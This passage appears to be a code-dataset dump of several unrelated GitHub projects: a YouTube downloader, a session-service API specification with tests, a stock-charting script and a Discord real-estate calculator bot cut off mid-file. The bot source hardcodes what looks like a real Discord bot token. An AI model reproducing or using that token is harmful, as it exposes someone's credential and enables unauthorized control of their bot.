[line.strip().split(' || ') for line in lines]\nfor x in lineArray:\n\tdownload_file(x[0], x[1])" }, { "alpha_fraction": 0.6260162591934204, "alphanum_fraction": 0.6260162591934204, "avg_line_length": 40.16666793823242, "blob_id": "c47f841e40e321bfa7ceae232e8440b8d5177882", "content_id": "61dd28df886ed687e73b888bea590938e5405da5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 246, "license_type": "no_license", "max_line_length": 70, "num_lines": 6, "path": "/support/errors.py", "repo_name": "elaa0505/PyTubeDown", "src_encoding": "UTF-8", "text": "from support.colors import c_white, c_green, c_red, c_yellow, c_blue\n\nerror = f'{c_blue}[ERROR] {c_red}'\nwarning = f'{c_blue}[!] {c_yellow}'\nsuccess = f'{c_blue}[+] {c_green}'\nprint_help = f'\\n{c_white}Type: -h/--help for help [Ex: script.py -h]'" }, { "alpha_fraction": 0.6783528923988342, "alphanum_fraction": 0.680647611618042, "avg_line_length": 32.96104049682617, "blob_id": "051c8b9ee9bb906ae900d7a76132abf95743d638", "content_id": "7422230a449c9285a0573c9dbcc4229763704813", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7844, "license_type": "no_license", "max_line_length": 170, "num_lines": 231, "path": "/down.py", "repo_name": "elaa0505/PyTubeDown", "src_encoding": "UTF-8", "text": "import threading\nimport argparse\nimport requests\nimport urllib\nimport httplib2\nimport sys\nfrom support.colors import c_white, c_green, c_red, c_yellow, c_blue\nfrom support.errors import error, warning, success, print_help\nfrom time import sleep\nfrom tqdm import tqdm\nfrom pytube import YouTube\nfrom selenium import webdriver\n\n# replace quotes in string\ndef remove_quotes(_string_):\n\t_string_=_string_.replace('\"', '')\n\treturn _string_\n\n# replce blank space in string\ndef replace_blank_space(_string_):\n\t_string_=_string_.replace(' ', '+')\n\treturn _string_\n\n# download vidos\nnot_downloaded = []\ndef download_video(video):\n\tif video == \"https://www.youtube.com/None\":\n\t\tprint(f\"{warning}Video 'None' type! Exiting..\")\n\t\texit()\n\telse:\n\t\ttry:\n\t\t\tYouTube(video).streams.first().download()\n\t\t\tprint(f\"{success} Downloaded: {c_yellow}{video}{c_white}\")\n\t\texcept:\n\t\t\t# try again after timeout\n\t\t\tsleep(3)\n\t\t\ttry:\n\t\t\t\tdownload_video(video)\n\t\t\texcept:\n\t\t\t\tprint(f\"{error}[-] {video}{c_white}\")\n\t\t\t\tnot_downloaded.append(video)\n\n# thread creator \\(~_~)/\ndef thread_ripper(video_links):\n\trippers = [threading.Thread(target=download_video, args=(video,)) for video in video_links] # create list of threads with target to download videos\n\tpbar = tqdm(total=len(rippers)) # initiate progressbar\n\tfor ripper in rippers: # for each thread in list of threads\n\t\tripper.start() # start thread\n\tfor ripper in rippers:\n\t\tripper.join() # add thread to thread pool\n\t\tpbar.update(1) # update progress bar\n\n\tsleep(2)\n\n\t# try again for not downloaded: multi-theading again\n\trippers = [threading.Thread(target=download_video, args=(video,)) for video in not_downloaded] # create list of threads with target to download videos\n\tpbar = tqdm(total=len(rippers)) # initiate progressbar\n\tfor ripper in rippers: # for each thread in list of threads\n\t\tripper.start() # start thread\n\tfor ripper in rippers:\n\t\tripper.join() # add thread to thread pool\n\t\tpbar.update(1) # update progress bar\n\n\t# if not_downloaded is not empty\n\tif len(not_downloaded) > 0:\n\t\t# print error message\n\t\tprint(f\"{error}Unable to download following videos:\")\n\t\t# for each in not_downloaded,\n\t\tfor v in not_downloaded:\n\t\t\t# print url\n\t\t\tprint(f\"{c_yellow}{v}{c_white}\")\n\t\t# reattempt the download\n\t\tprint(\"Reattempting.. in single thread mode\")\n\t\tfor v in not_downloaded:\n\t\t\t# download one at a time, then next\n\t\t\tdownload_video(v)\n\n# generate video links\ndef get_vids(topic, scrl):\n\tvideo_links = [] # store video links in list\n\ttopic = remove_quotes(topic) # remove quotes from topic\n\ttopic = replace_blank_space(topic) # replace blank\n\tsite = f\"https://www.youtube.com/results?search_query={topic}\" # form the url\n\tdriver = webdriver.Firefox() # start webdriver\n\tdriver.get(site) # open the url\n\texec_string = f\"window.scrollTo(0, {scrl})\" # make page scroll javascript with what user specified\n\tsleep(3) # delay 3 seconds\n\tdriver.execute_script(exec_string) # execute the javascript on url page\n\tsleep(5) # delay 5 seconds\n\n\t# find video elements\n\tvideo_titles = driver.find_elements_by_id(\"video-title\")\n\n\t# save links\n\tfor video_title in video_titles:\n\t\t# get the attributes using selenium\n\t\tlnk = video_title.get_attribute('href')\n\t\t# concatenation\n\t\tformed_link = f\"https://www.youtube.com/{lnk}\"\n\t\t# append formed url to video_links\n\t\tvideo_links.append(formed_link)\n\tdriver.quit()\n\n\t# download videos with multiple threads\n\tthread_ripper(video_links)\n\ndef get_playlist(url):\n\t# remove quoted from the link\n\turl = remove_quotes(url)\n\tplaylist = \"https://www.youtube.com/playlist?list=\"\n\n\t# if the playlist is in watch mode\n\t# because it's harder to scroll inside that tiny sidenav in YouTube\n\tif \"/watch?v=\" in url:\n\t\tlist_link = url.split(\"&\")[1][5:] # get list unique url\n\t\tplaylist += list_link # update variable\n\telse:\n\t\t# make playlist same as url\n\t\tplaylist = url\n\n\t# get videos link in playlist\n\tvideo_links = []\n\t# define webdriver\n\tdriver = webdriver.Firefox()\n\t# get the playlist using selenium\n\tdriver.get(playlist)\n\tsleep(5) # seconds\n\t# find elements with class name\n\tlink_elems = driver.find_elements_by_class_name(\"ytd-playlist-video-renderer\")\n\tprint(\"Gathering videos from playlist..\")\n\t# for each item in link_elems\n\tfor link_elem in link_elems:\n\t\t# get the link from href attribute\n\t\twatch_link = link_elem.get_attribute('href')\n\t\tvideo_links.append(watch_link) # add new item to the list of video links\n\tdriver.quit() # quit the driver\n\t# clean video_links of: None\n\tprint(\"Cleaning video list\")\n\tclean_list = [x for x in video_links if x is not None] # remove the 'None' types from list\n\twatch_list = [] # define new list\n\tfor item in clean_list: # for each item in clean list\n\t\titemArray = item.split(\"&\") # split the item using '&' character\n\t\twatch_list.append(itemArray[0]) # get the first part and add to watch_list\n\tprint(f\"Total Videos: {len(watch_list)}\") # get the number of items and print\n\tthread_ripper(watch_list) # start the thread ripper on array\n\n# get get individual links\ndef get_link(url):\n\turl = remove_quotes(url)\n\tdownload_video(url)\n\n# reading git version of script\ndef read_git_version():\n\t# read version file from github\n\threq = httplib2.Http()\n\tresponse_header,content=hreq.request(\"https://raw.githubusercontent.com/ProHackTech/pytubedown/master/version.me\",\"GET\")\n\tcontent = content.decode()\n\tcontent = int(content)\n\treturn content\n\n# reading local version file\ndef read_my_version():\n\tversion_me = 0\n\t# read current version\n\twith open(\"version.me\", \"r\") as fversion:\n\t\tfor line in fversion:\n\t\t\tversion_me = line\n\tversion_me = int(version_me)\n\treturn version_me\n\n# check for updates\ndef update_me():\n\tversion_me, content = read_my_version(), read_git_version()\n\t# compare versions\n\tif version_me < content:\n\t\tprint(f\"{success} There is a new version available!\\nRun /updater/update.py for updating..\")\n\telse:\n\t\tprint(f\"{c_blue}Already Updated!{c_white}\")\n\ndef networkIsUp():\n\ttry:\n\t\trequests.get(\"https://duckduckgo.com/\")\n\t\treturn True\n\texcept:\n\t\tprint(f\"{error}Your internet is not working!{c_white}\")\n\t\treturn False\n\nparser = argparse.ArgumentParser(description=\"pytubedown: YouTube video downloader in Python\")\nparser.add_argument(\"-t\", \"--topic\", help=\"Enter topic name\", type=str)\nparser.add_argument(\"-scrl\", \"--scroll\", help=\"Enter max scroll\", type=int)\nparser.add_argument(\"-upd\", \"--update\", help=\"Update pytubedown\", action=\"store_true\")\nparser.add_argument(\"-pl\", \"--playlist\", help=\"Download Playlist\", type=str)\nparser.add_argument(\"-l\", \"--link\", help=\"Single link download\", type=str)\nargs = parser.parse_args()\n\n# ascii art\nprint('''\n ____ ___ _ _____ _ ____ _____ ____ ____ _ _ \n/ __\\\\ \\\\///__ __\\\\/ \\\\ /\\\\/ _ \\\\/ __// _ \\\\/ _ \\\\/ \\\\ /|/ \\\\ /|\n| \\\\/| \\\\ / / \\\\ | | ||| | //| \\\\ | | \\\\|| / \\\\|| | ||| |\\\\ ||\n| __/ / / | | | \\\\_/|| |_\\\\| /_ | |_/|| \\\\_/|| |/\\\\||| | \\\\||\n\\\\_/ /_/ \\\\_/ \\\\____/\\\\____/\\\\____\\\\____/\\\\____/\\\\_/ \\\\|\\\\_/ \\\\|\n \n\t''')\n\nif networkIsUp() == True:\n\t# read version\n\tmy_version = read_my_version()\n\tprint(f\"\\n{c_green} Version: {c_white} {my_version}\\n\")\n\t# update the updater that updates this which we are updating here :v\n\ttry:\n\t\turllib.request.urlretrieve(\"https://raw.githubusercontent.com/ProHackTech/pytubedown/master/updater/update.py\", \"updater/update.py\")\n\texcept:\n\t\tprint(f\"{error}Unable to retreieve updater!{c_white}\\n You can manually download it from:{c_yellow} github.com/ProHackTech/pytubedown/tree/master/updater{c_white}\\n\\n\")\n\t\n\t# download via topic\n\tif args.topic:\n\t\tif args.scroll:\n\t\t\tget_vids(args.topic, args.scroll)\n\t\telse:\n\t\t\tget_vids(args.topic, 0)\n\t# update script\n\telif args.update:\n\t\tupdate_me()\n\t# playlist download\n\telif args.playlist:\n\t\tget_playlist(args.playlist)\n\telif args.link:\n\t\tget_link(args.link)\n\telse:\n\t\tprint(f\"{error}Please specify something{print_help}\")" } ]
4
cbednarski/session-spec
https://github.com/cbednarski/session-spec
0a783aacd18ab8d2d0bc2ae2524187c8143b6d67
f8e9a92cd7759ee2105b4e8415d6516c2b973bed
dd5b2717d51cc1ef25dedb6781e990e5325bc91a
refs/heads/master
2019-04-18T23:38:49.424034
2013-11-13T08:39:46
2013-11-13T08:39:46
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.701127827167511, "alphanum_fraction": 0.7203007340431213, "avg_line_length": 60.86046600341797, "blob_id": "519cc6056af9c1e6665202351242dd1d7b5bd5c6", "content_id": "35649dcdd1e31f3a457455a0e297d5f3e2d276cb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2662, "license_type": "no_license", "max_line_length": 231, "num_lines": 43, "path": "/README.md", "repo_name": "cbednarski/session-spec", "src_encoding": "UTF-8", "text": "# Session Service Specification\n\nThis repo is a set of functional tests written in python that describe the REST interface for a session service. The initial implementation is based on the API for [seshun](https://github.com/avayanis/seshun).\n\n### Terminology\n\n - **client app:** an application that stores some data in seshun\n - **session:** a blob of user data that’s stored in seshun by a client app\n - **bucket:** a way for client apps to segment their data apart from other client apps. Not a reference to any particular implementation that uses \"bucket\" terminology.\n - **id:** a Universally Unique Identifier (UUID)\n - **API key:** authentication mechanism to prevent tampering of data by unauthorized / anonymous clients.\n\n### Basic Rest-y Interface\n\nA session is accessed via standard HTTP / REST verbs.\n\n| Action | URI | Description | Response |\n|--------|-----|-------------|----------|\n| Any | All | Any method + URL mismatches will respond with a 405 Method Not Allowed | 405 Method Not Allowed |\n| Any | All | Any request made without a valid API key will respond with a 401 Not Authorized | 401 Not Authorized |\n| PUT | /session/bucket | Create a new session | 201 Created on success |\n| GET | /session/bucket/id | Retrieve session data corresponding to the specified id, extend TTL | 200 Success; 404 Not Found if `id` is missing |\n| POST | /session/bucket/id | Update session data that corresponds to the specified id, extend TTL | 200 Success; 404 Not found if `id` is missing |\n| DELETE | /session/bucket/id | Delete a session that corresponds to the specified id | 200 OK on success; 404 Not Found if `id` is missing / already deleted |\n\n### API Keys\n\nAPI keys are sent via a header (X-API-KEY).\n\nIf the API key is not valid, the client will receive a 401 Not Authorized header.\n\n### API Key API\n\nOne or more master API key are configured in the seshun config file. Changing these requires a server restart. Requests made to the /api-key/ endpoint using these API keys can be used to make new bucket + API key pairs for clients.\n\n| Action | URI | Description | Response |\n|--------|-----|-------------|----------|\n| PUT | /api-key/bucket | Responds with new API key | 201 Created on success; 409 Conflict on duplicate bucket name |\n| POST | /api-key/bucket | invalid | 405 Method Not Allowed |\n| GET | /api-key/bucket | Responds with the current API key | 200 OK on success |\n| DELETE | /api-key/bucket | used to delete an API key | 200 OK on success\n\nA key regeneration operation is handled via DELETE and PUT. This emphasizes the destructive / service-interruptive nature of the change, and leaves key generation methods to the server.\n" }, { "alpha_fraction": 0.7575757503509521, "alphanum_fraction": 0.7575757503509521, "avg_line_length": 19, "blob_id": "4a858decb0b6ea8cece2016b4b4fa6aeca7e7f68", "content_id": "e92cf881d14c199e634f1aabef9652256970806e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 99, "license_type": "no_license", "max_line_length": 39, "num_lines": 5, "path": "/Makefile", "repo_name": "cbednarski/session-spec", "src_encoding": "UTF-8", "text": "all: init test\ninit:\n\tpip install -r requirements.txt\ntest:\n\tpy.test --verbose test_session_spec.py" }, { "alpha_fraction": 0.46666666865348816, "alphanum_fraction": 0.6666666865348816, "avg_line_length": 14, "blob_id": "a3ee4f35227c435d0c5b7ef895c3959b01ea2572", "content_id": "39c20ccae83534bf5a9f5764dbe1a89fb57f4e1e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 30, "license_type": "no_license", "max_line_length": 15, "num_lines": 2, "path": "/requirements.txt", "repo_name": "cbednarski/session-spec", "src_encoding": "UTF-8", "text": "requests==2.0.1\npytest==2.4.2\n" }, { "alpha_fraction": 0.5945945978164673, "alphanum_fraction": 0.6268951892852783, "avg_line_length": 32.71111297607422, "blob_id": "ec86b88288b21b6bdf04bfe7b071e3518321103b", "content_id": "47937f82cf130b85898dfecb48d54ebf683bf2ff", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1517, "license_type": "no_license", "max_line_length": 139, "num_lines": 45, "path": "/test_session_spec.py", "repo_name": "cbednarski/session-spec", "src_encoding": "UTF-8", "text": "from __future__ import print_function\nimport re\n\nimport requests\n\n# Configs\nbase_url = 'http://127.0.0.1:8385'\nadmin_url = 'http://127.0.0.1:8386'\nbucket_name = 'myapp'\nadmin_key = 'this_should_be_something_secret'\n\n\nclass State(object):\n api_key = None\n\n\ndef test_create_key():\n r = requests.put(admin_url + '/api-key/' + bucket_name, headers={'X-ADMIN-API-KEY': admin_key})\n assert 201 == r.status_code\n\ndef test_duplicate_key():\n r = requests.put(admin_url + '/api-key/' + bucket_name, headers={'X-ADMIN-API-KEY': admin_key})\n assert(409 == r.status_code)\n\ndef test_get_key():\n r = requests.get(admin_url + '/api-key/' + bucket_name, headers={'X-ADMIN-API-KEY': admin_key})\n assert('api_key' in r.json())\n assert re.match('^[a-z0-9]{8}(-[a-z0-9]{4}){3}-[a-z0-9]{12}$', r.json()['api_key']) is not None, 'Verify the API key looks like a UUID'\n State.api_key = r.json()['api_key']\n assert('bucket' in r.json())\n assert(r.json()['bucket'] == bucket_name)\n assert(200 == r.status_code)\n\ndef test_get_key_again():\n r = requests.get(admin_url + '/api-key/' + bucket_name, headers={'X-ADMIN-API-KEY': admin_key})\n assert(State.api_key == r.json()['api_key'])\n\ndef test_405_on_post():\n r = requests.post(admin_url + '/api-key/' + bucket_name, headers={'X-ADMIN-API-KEY': admin_key})\n assert(405 == r.status_code)\n\n\ndef test_delete_key():\n r = requests.delete(admin_url + '/api-key/' + bucket_name, headers={'X-ADMIN-API-KEY': admin_key})\n assert(200 == r.status_code)\n" } ]
4
eprst/trading-helper
https://github.com/eprst/trading-helper
1705a513c54de9747cf7608ef8078b480b733fe5
262498ba83c05760639d89e761bd467806ab0ca8
d5db88f54f105bbf19c61cc3d2161e091df16df0
refs/heads/main
2023-02-08T23:33:42.776841
2020-12-29T08:40:29
2020-12-29T08:40:29
325,209,526
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7128027677536011, "alphanum_fraction": 0.7240484356880188, "avg_line_length": 29.421052932739258, "blob_id": "108b92d257eb00840dd4b21e567421f519a3bcee", "content_id": "0ebb19fb8b69f3cd7a281efc8fa3082cc3493f35", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1156, "license_type": "permissive", "max_line_length": 92, "num_lines": 38, "path": "/th.py", "repo_name": "eprst/trading-helper", "src_encoding": "UTF-8", "text": "from datetime import datetime, timedelta\n\nimport matplotlib.pyplot as plt\nfrom alpha_vantage.techindicators import TechIndicators\nfrom alpha_vantage.timeseries import TimeSeries\nfrom matplotlib.pyplot import figure\n\ndays = 30\n\nend_date = datetime.today()\nstart_date = end_date - timedelta(days=days)\n\n\ndef filter_frame(frame):\n result = frame[(frame.index > start_date) & (frame.index <= end_date)]\n result = result.sort_index(ascending=True)\n return result\n\n\nwith open('alphavantage_api_key') as keyfile:\n api_key = keyfile.readline().strip()\n\nts = TimeSeries(api_key, output_format='pandas')\nti = TechIndicators(api_key, output_format='pandas')\n\naapl_data, aapl_meta_data = ts.get_intraday(symbol='aapl', outputsize='full')\naapl_bands, aapl_meta_bands = ti.get_bbands(symbol='aapl', interval='daily', time_period=20)\npton_rsi, q = ti.get_rsi(symbol='aapl', interval='daily', time_period=14)\n\nfigure(num=None, figsize=(15, 6), dpi=80, facecolor='w', edgecolor='k')\n# aapl_bands.plot()\n# pton_rsi.plot()\n# aapl_data['4. close'].plot()\nfilter_frame(aapl_data)['5. adjusted closed'].plot()\n\nplt.tight_layout()\nplt.grid()\nplt.savefig('graph.png')\n" }, { "alpha_fraction": 0.4680851101875305, "alphanum_fraction": 0.6869301199913025, "avg_line_length": 15.449999809265137, "blob_id": "08554cf01d26afc55c7ad6a18e5701320596889e", "content_id": "ecfbf1547466ddcbcd1960e4a3bc4c71c8bd43d6", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 329, "license_type": "permissive", "max_line_length": 26, "num_lines": 20, "path": "/requirements.txt", "repo_name": "eprst/trading-helper", "src_encoding": "UTF-8", "text": "aiohttp==3.7.3\nalpha-vantage==2.3.1\nasync-timeout==3.0.1\nattrs==20.3.0\ncertifi==2020.12.5\nchardet==3.0.4\nDateTime==4.3\nidna==2.10\nlxml==4.6.2\nmultidict==5.1.0\nnumpy==1.19.4\npandas==1.2.0\npython-dateutil==2.8.1\npytz==2020.5\nrequests==2.25.1\nsix==1.15.0\ntyping-extensions==3.7.4.3\nurllib3==1.26.2\nyarl==1.6.3\nzope.interface==5.2.0\n" } ]
2
RyanNDao/Public-RE-Bot
https://github.com/RyanNDao/Public-RE-Bot
47f596c6c799636b61a1770a4cff5ea8533ecb19
43268f75052afe610adcc4be159dbe053eada7cb
33e5306be8a4e63c49601471dcc4dd0d056afff2
refs/heads/master
2023-01-05T21:48:51.261641
2020-11-02T00:55:39
2020-11-02T00:55:39
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6551122665405273, "alphanum_fraction": 0.6756229996681213, "avg_line_length": 34.58759307861328, "blob_id": "20d4eef597cfaf85e40ccb303cc05cc19234b786", "content_id": "b9b77db4b65e7c59b9e33aa4ed5aa6835de5064c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9751, "license_type": "no_license", "max_line_length": 169, "num_lines": 274, "path": "/RealEstateCalculatorBotV1.py", "repo_name": "RyanNDao/Public-RE-Bot", "src_encoding": "UTF-8", "text": "'''Bot developed by Rye#9601'''\n\nimport asyncio\nimport discord\nfrom discord.ext import commands\n\nTOKEN = 'NzcyMjI0NDUzMDI3MTY4Mjc3.X53kEA.2xDd0-qwA5Pst-ilGnislVGC_-8'\nbot = commands.Bot(command_prefix='$')\ngame = discord.Game('with your money')\n\n\[email protected]\nasync def on_ready():\n\tprint('Logged in as:')\n\tprint(bot.user.name)\n\tprint(bot.user.id)\n\tprint('--------')\n\tawait bot.change_presence(status=discord.Status.online, activity=game)\ndef amort(mortgage, stop, worth, principal, intRate, monthly, PMI, totalPMI, count):\n\tif worth >= stop:\n\t\tPMIList = [totalPMI, round(PMI / 12, 2), count]\n\t\treturn PMIList\n\telse:\n\t\tinterest = (intRate/12)*mortgage\n\t\tprincipal = monthly - interest\n\t\tworth += principal\n\t\tmortgage -= principal\n\t\tmonthlyPMI = PMI/12\n\t\ttotalPMI += monthlyPMI\n\t\tcount += 1\n\t\treturn amort(mortgage, stop, worth, principal, intRate, monthly, PMI, totalPMI, count)\ndef check(m):\n\treturn m.content.isdigit() or m.content == 'quit'\ndef percCheck(m):\n\tif m.content == \"quit\":\n\t\treturn True\n\telse:\n\t\tif m.content[-1] == \"%\":\n\t\t\ttry:\n\t\t\t\tfloat(m.content[:-1])\n\t\t\t\treturn True\n\t\t\texcept ValueError:\n\t\t\t\treturn False\n\t\telse:\n\t\t\tif m.content.isdigit():\n\t\t\t\treturn True\n\t\t\telse:\n\t\t\t\ttry:\n\t\t\t\t\tfloat(m.content)\n\t\t\t\t\treturn True\n\t\t\t\texcept ValueError:\n\t\t\t\t\treturn False\ndef case_insensitive(message):\n\treturn message.content.lower()\ndef booleanCheck(m):\n\tm.content = case_insensitive(m)\n\tif m.content == 'y' or m.content == 'n' or m.content == 'yes' or m.content == 'no' or m.content =='quit':\n\t\treturn True\n\telse:\n\t\treturn False\ndef zipCodeCheck(m):\n\tif m.content.isdigit() and len(m.content)==5:\n\t\treturn True\n\telse:\n\t\treturn False\n\t\t\ndef notBot(m):\n\tif m.author == bot.user:\n\t\treturn False\n\telse:\n\t\treturn True\nasync def percWait(ctx):\n\ttry:\n\t\tpercent = await bot.wait_for('message', check=percCheck, timeout=30)\n\t\tif percent.content.isdigit():\n\t\t\tpercent = float(int(percent.content))\n\t\t\treturn percent\n\t\telif percent.content[-1] == \"%\":\n\t\t\tpercent = float(percent.content[:-1])\n\t\t\treturn percent\n\t\telif percent.content == 'quit':\n\t\t\tawait ctx.send('Quitting calculator program.')\n\t\t\treturn 'quit'\n\t\telse:\n\t\t\tpercent = float(percent.content)\n\t\t\treturn percent\n\texcept asyncio.TimeoutError:\n\t\tawait ctx.send('You took too long! Program terminated.')\n\t\treturn 'quit'\n\n\[email protected]\nasync def on_message(message):\n\tif message.author == bot.user:\n\t\treturn\n\tawait bot.process_commands(message)\n\n\[email protected](aliases=['c'])\nasync def calculate(ctx, message=None, validPercent=False,PMI=False):\n\tawait ctx.send('Developed by Rye#9601, a college student, real estate enthusiast, and future investor. Gladly taking comments, questions, or suggestions!')\n\tawait ctx.send('Type \\\"quit\\\" at any time to quit the calculator.')\n\tawait ctx.send('Use default property percentages? (20% down payment, 3% interest)')\n\ttry:\n\t\tdefault = await bot.wait_for('message',check = booleanCheck,timeout=30)\n\texcept asyncio.TimeoutError:\n\t\tawait ctx.send('You took too long! Program terminated.')\n\t\treturn\n\tdefault.content = case_insensitive(default)\n\tif default.content == 'quit':\n\t\tawait ctx.send('Quitting calculator program.')\n\t\treturn\n\tif default.content == 'y' or default.content == 'yes':\n\t\tdefault = True\n\t\tawait ctx.send('Using default percentages.')\n\telse:\n\t\tdefault = False\n\t\tawait ctx.send('Overwriting default property percentages.')\n\tawait ctx.send('Use default expense percentages? (1% PMI, 4% closing costs, 5% vacancy, 7% CapEx & repairs)')\n\ttry:\n\t\texpenseDefault = await bot.wait_for('message', check=booleanCheck, timeout=30)\n\texcept asyncio.TimeoutError:\n\t\tawait ctx.send('You took too long! Program terminated.')\n\t\treturn\n\texpenseDefault.content = case_insensitive(expenseDefault)\n\tif expenseDefault.content == 'quit':\n\t\tawait ctx.send('Quitting calculator program.')\n\t\treturn\n\tif expenseDefault.content == 'y' or expenseDefault.content == 'yes':\n\t\texpenseDefault = True\n\t\tawait ctx.send('Using default expense percentages.')\n\telse:\n\t\texpenseDefault = False\n\t\tawait ctx.send('Overwriting default expense percentages.')\n\tawait ctx.send('Enter property value:')\n\ttry:\n\t\tvalue = await bot.wait_for('message',check=check,timeout=30)\n\t\tif value.content == 'quit':\n\t\t\tawait ctx.send('Quitting calculator program.')\n\t\t\treturn\n\t\telse:\n\t\t\tvalue = int(value.content)\n\texcept asyncio.TimeoutError:\n\t\tawait ctx.send('You took too long! Program terminated.')\n\t\treturn\n\tawait ctx.send('Property value has been set to **${:,d}**'.format(value))\n\twhile not validPercent:\n\t\tif default:\n\t\t\tdownPayment = 20\n\t\t\tvalidPercent = True\n\t\t\tawait ctx.send('Assuming 20% down payment.')\n\t\telse:\n\t\t\tawait ctx.send('Enter down payment percentage:')\n\t\t\tdownPayment = await percWait(ctx)\n\t\t\tif downPayment == 'quit':\n\t\t\t\treturn\n\t\t\tif downPayment <0 or downPayment > 100:\n\t\t\t\tawait ctx.send('Enter a valid percentage between 0 to 100. Try again.')\n\t\t\telif 0 <= downPayment <= 100:\n\t\t\t\tvalidPercent = True\n\tawait ctx.send('Down payment percentage has been set to **{:.2f}%**'.format(downPayment))\n\tif default == True:\n\t\tawait ctx.send('Assuming interest rate of 3%')\n\t\tintRate = 3\n\telse:\n\t\tawait ctx.send('Enter interest rate:')\n\t\tintRate = await percWait(ctx)\n\t\tif intRate == 'quit':\n\t\t\treturn\n\t\tawait ctx.send('Interest rate has been set to **{:.2f}%**'.format(intRate))\n\tawait ctx.send('Enter an estimate of expected rent payments:')\n\ttry:\n\t\trent = await bot.wait_for('message',check=check,timeout=30)\n\t\tif rent.content == 'quit':\n\t\t\tawait ctx.send('Quitting calculator program.')\n\t\t\treturn\n\t\telse:\n\t\t\trent = int(rent.content)\n\texcept asyncio.TimeoutError:\n\t\tawait ctx.send('You took too long! Program terminated.')\n\t\treturn\n\tawait ctx.send('Rent has been set to **${:,d}**'.format(rent))\n\tif downPayment<20:\n\t\tif expenseDefault == True:\n\t\t\tawait ctx.send('Down payment is lower than 20%. PMI is required. 1% PMI is assumed.')\n\t\t\tPMI = True\n\t\t\tPMIPerc = 1\n\t\telse:\n\t\t\tawait ctx.send('Down payment is lower than 20%. PMI is required. Enter PMI percentage.')\n\t\t\tPMI = True\n\t\t\tPMIPerc = await percWait(ctx)\n\t\t\tif PMIPerc == 'quit':\n\t\t\t\treturn\n\t\t\tawait ctx.send('PMI has been set to **{:.2f}%**'.format(PMIPerc))\n\tif expenseDefault:\n\t\tawait ctx.send('Assuming 4% closing costs.')\n\t\tclosingCost = 4\n\t\tawait ctx.send('Assuming 5% vacancy.')\n\t\tvacancy = 5\n\t\tawait ctx.send('Assuming 7% CapEx.')\n\t\tcapEx = 7\n\t\tawait ctx.send('Assuming 7% repairs.')\n\t\trepairs = 7\n\telse:\n\t\tawait ctx.send('Enter vacancy rate:')\n\t\tvacancy = await percWait(ctx)\n\t\tif vacancy == 'quit':\n\t\t\treturn\n\t\tawait ctx.send('Vacancy has been set to **{:.2f}%**'.format(vacancy))\n\t\tawait ctx.send('Enter CapEx rate:')\n\t\tcapEx = await percWait(ctx)\n\t\tif capEx == 'quit':\n\t\t\treturn\n\t\tawait ctx.send('Capital expeditures has been set to **{:.2f}%**'.format(capEx))\n\t\tawait ctx.send('Enter repairs percentage:')\n\t\trepairs = await percWait(ctx)\n\t\tif repairs == 'quit':\n\t\t\treturn\n\t\tawait ctx.send('Repairs has been set to **{:.2f}%**'.format(repairs))\n\t\tawait ctx.send('Enter closing cost percentage:')\n\t\tclosingCost = await percWait(ctx)\n\t\tif closingCost == 'quit':\n\t\t\treturn\n\t\tawait ctx.send('Closing cost percentage has been set to **{:.2f}%**'.format(closingCost))\n\tawait ctx.send('Calculating... Because of the Discord messaging delay this may take a while. Please be patient.')\n\tawait ctx.send('\\u200B')\n\tawait ctx.send('**__Calculations__**')\n\tdownPayment /= 100\n\tclosingCost /= 100\n\tintRate /= 100\n\tvacancy /= 100\n\tcapEx /= 100\n\trepairs /= 100\n\tmonthly = round((((1-downPayment)*value)*((intRate/12)*(1+(intRate/12))**360/((1+(intRate/12))**360-1))),2)\n\tawait ctx.send('With a 30-year ${:,d} mortgage at an interest rate of **{:.2f}%**, you will be paying **${:,d} every month**, '\n\t 'totalling **${:,d}** over the life of the mortgage.'\n\t .format(round((1-downPayment)*value),intRate*100,round(monthly), round(monthly*360)))\n\tawait ctx.send('**Down Payment**({:.2f}%) : *${:,d}*'.format(downPayment * 100, round(value * downPayment)))\n\tawait ctx.send('**Closing Costs**({:.2f}%) : *${:,d}*'.format(closingCost * 100, round(value * closingCost)))\n\tawait ctx.send('**Rent**: *${:,d}*'.format(rent))\n\tawait ctx.send('\\u200B')\n\tawait ctx.send('**__Monthly Expenses__**')\n\tawait ctx.send('**Vacancy**({:.2f}%) : *${:,d}*'.format(vacancy * 100, round(rent * vacancy)))\n\tawait ctx.send('**Capital Expeditures**({:.2f}%) : *${:,d}*'.format(capEx * 100, round(rent * capEx)))\n\tawait ctx.send('**Repairs**({:.2f}%) : *${:,d}*'.format(repairs * 100, round(rent * repairs)))\n\tif PMI == True:\n\t\tPMIPerc /= 100\n\t\tPMIList = amort((1-downPayment)*value,(.20*value)-(downPayment*value),0, 0, intRate, monthly, PMIPerc*((1-downPayment)*value), 0, 0)\n\t\tPMIAmount = PMIList[1]\n\t\tif PMIList[2] == 1:\n\t\t\tawait ctx.send('**PMI Value**({:.2f}%) : {:d} payment of *${:,d}/mo* for a total of *${:,d}*'.format(PMIPerc * 100, PMIList[2], round(PMIList[1]), round(PMIList[0])))\n\t\telse:\n\t\t\tawait ctx.send('**PMI Value**({:.2f}%) : {:d} payments of *${:,d}/mo* for a total of *${:,d}*'.format(PMIPerc * 100, PMIList[2], round(PMIAmount),round(PMIList[0])))\n\trepairAmount = round(rent * repairs)\n\tcapExAmount = round(rent * capEx)\n\tvacancyAmount = round(rent * vacancy)\n\tif PMI == True:\n\t\tmonthlyExpenses = monthly + repairAmount + capExAmount + vacancyAmount + PMIList[1]\n\telse:\n\t\tmonthlyExpenses = monthly + repairAmount + capExAmount + vacancyAmount\n\tawait ctx.send('**Total** : *${:,d}*'.format(round(monthlyExpenses)))\n\tawait ctx.send('\\u200B')\n\tawait 